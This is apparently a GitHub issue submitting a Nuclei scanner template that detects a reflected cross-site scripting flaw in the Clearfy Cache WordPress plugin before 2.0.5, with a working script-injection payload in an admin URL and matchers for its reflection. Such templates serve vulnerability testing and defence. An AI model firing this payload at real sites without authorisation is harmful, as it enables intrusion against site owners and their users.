### ISSUE TITLE
Clearfy Cache < 2.0.5 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4692]
```yaml
id: clearfy-cache-xss

info:
  name: Clearfy Cache < 2.0.5 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
